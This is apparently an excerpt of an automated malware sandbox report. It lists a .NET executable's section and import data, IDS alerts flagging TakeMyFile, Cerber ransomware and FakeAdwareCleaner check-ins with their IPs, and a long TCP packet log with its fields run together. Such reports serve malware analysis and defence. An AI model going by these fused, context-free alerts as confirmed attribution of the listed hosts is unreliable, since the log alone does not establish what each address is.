                                                                                                                                                .reloc0x2a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                RT_VERSION0x280a00x2dcdata
                                                                                                                                                RT_MANIFEST0x2837c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                DLLImport
                                                                                                                                                mscoree.dll_CorExeMain
                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                192.168.2.354.242.4.10149772802849813 09/29/22-14:50:03.652241TCP2849813ETPRO MALWARE TakeMyFile Installer Checkin4977280192.168.2.354.242.4.101
                                                                                                                                                192.168.2.354.242.4.10149772802849814 09/29/22-14:50:03.652241TCP2849814ETPRO MALWARE TakeMyFile User-Agent4977280192.168.2.354.242.4.101
                                                                                                                                                192.168.2.393.107.12.06552368932023619 09/29/22-14:48:40.474898UDP2023619ET TROJAN Ransomware/Cerber Checkin M3 (8)655236893192.168.2.393.107.12.0
                                                                                                                                                192.168.2.3185.53.177.5349787802809804 09/29/22-14:50:12.037893TCP2809804ETPRO MALWARE FakeAdwareCleaner.A Checkin4978780192.168.2.3185.53.177.53
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Sep 29, 2022 14:48:08.018487930 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.018556118 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.018687963 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.019007921 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.019026995 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.081469059 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.081702948 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.082329988 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.082349062 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.086823940 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.086854935 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.087011099 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.087033987 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.087141991 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.087163925 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.087300062 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.087326050 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.087343931 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.087352037 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.087398052 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.087404966 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.212564945 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.212660074 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.212835073 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.212835073 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.212956905 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.212980986 CEST44349682204.79.197.200192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:08.213001966 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:08.213049889 CEST49682443192.168.2.3204.79.197.200
                                                                                                                                                Sep 29, 2022 14:48:09.724353075 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.724411011 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.724499941 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.728647947 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.728673935 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.795727015 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.795968056 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.833914042 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.833949089 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.834578991 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.883203983 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.884063959 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.884078979 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.902019978 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.902163029 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.902245998 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.902288914 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.902309895 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.902323961 CEST49683443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.902331114 CEST4434968323.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.940376997 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.940428972 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:09.940670013 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.941127062 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:09.941139936 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:10.000840902 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:10.001516104 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:10.001543999 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:10.002492905 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:10.002501011 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:10.033998013 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:10.034087896 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:10.034188032 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:10.035753965 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:10.035787106 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:10.035815001 CEST49684443192.168.2.323.50.105.163
                                                                                                                                                Sep 29, 2022 14:48:10.035825014 CEST4434968423.50.105.163192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:19.436674118 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:19.436737061 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:19.436820030 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:19.490286112 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:19.490328074 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:19.542956114 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:19.543075085 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:19.547873020 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:19.547909021 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:19.548532009 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:19.602230072 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:20.079818964 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:20.079868078 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.289508104 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.289664984 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.289731979 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:20.289750099 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.289803028 CEST44349685140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.289846897 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:20.295844078 CEST49685443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:20.351358891 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.351422071 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.351583958 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.352884054 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.352921009 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.408255100 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.408360004 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.412389040 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.412453890 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.412974119 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.414633036 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.414676905 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.432112932 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.434382915 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.434406042 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.434490919 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.434528112 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.434591055 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.437479973 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.437504053 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.437591076 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.437632084 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.437657118 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.449201107 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.449250937 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.449434996 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.449475050 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.451607943 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.451633930 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.451767921 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.451807022 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.451834917 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.455785990 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.455828905 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.455971003 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.456012011 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.456051111 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.456135035 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.456162930 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.456209898 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.456229925 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.456285000 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.464905024 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.464965105 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.465020895 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.465056896 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.465079069 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.466573000 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.466610909 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.466706038 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.466741085 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.466767073 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.467833042 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.467881918 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.467968941 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.468000889 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.468023062 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.469209909 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.469249964 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.469340086 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.469378948 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.469405890 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.472573996 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.472629070 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.472685099 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.472718000 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.472743988 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.473747015 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.473788023 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.473872900 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.473905087 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.473928928 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.474442959 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.474494934 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.474562883 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.474590063 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.474612951 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.475678921 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.475722075 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.475805044 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.475836039 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.475860119 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.481365919 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.481430054 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.481527090 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.481544018 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.481583118 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.481609106 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.481615067 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.481621981 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.481661081 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.481683016 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.481724977 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.482209921 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.482254028 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.482315063 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.482330084 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.482361078 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.482392073 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.483616114 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.483659029 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.483741045 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.483768940 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.483803034 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.483838081 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.484693050 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.484735966 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.484810114 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.484829903 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.484858036 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.484888077 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.485018969 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.485059977 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.485104084 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.485115051 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.485130072 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.485151052 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.485241890 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.485284090 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.485338926 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.485349894 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.485392094 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.485419035 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.486694098 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.486736059 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.486818075 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.486846924 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.486867905 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.486896038 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.489586115 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.489638090 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.489825964 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.489864111 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.489918947 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.489976883 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.490021944 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.490080118 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.490094900 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.490124941 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.490145922 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.490277052 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.490335941 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.490381956 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.490401030 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.490432024 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.490453959 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.490467072 CEST44349686185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.490510941 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:20.491914988 CEST49686443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.670384884 CEST49687443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:29.670427084 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.670505047 CEST49687443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:29.671025991 CEST49687443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:29.671039104 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.710704088 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.716715097 CEST49687443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:29.716738939 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.744636059 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.744749069 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.744792938 CEST49687443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:29.744811058 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.744831085 CEST44349687140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.744873047 CEST49687443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:29.745610952 CEST49687443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:48:29.746797085 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.746872902 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.747011900 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.747761011 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.747785091 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.793080091 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.797864914 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.797911882 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.821022034 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.823446035 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.823477030 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.823555946 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.823596954 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.823613882 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.823647022 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.826493979 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.826541901 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.826592922 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.826605082 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.826632023 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.837930918 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.837974072 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.838020086 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.838041067 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.838083982 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.840398073 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.840425014 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.840468884 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.840481997 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.840502024 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.841753960 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.841785908 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.841820002 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.841830015 CEST44349688185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:29.841856003 CEST49688443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:48:29.843595982 CEST44349688185.199.108.133192.168.2.3
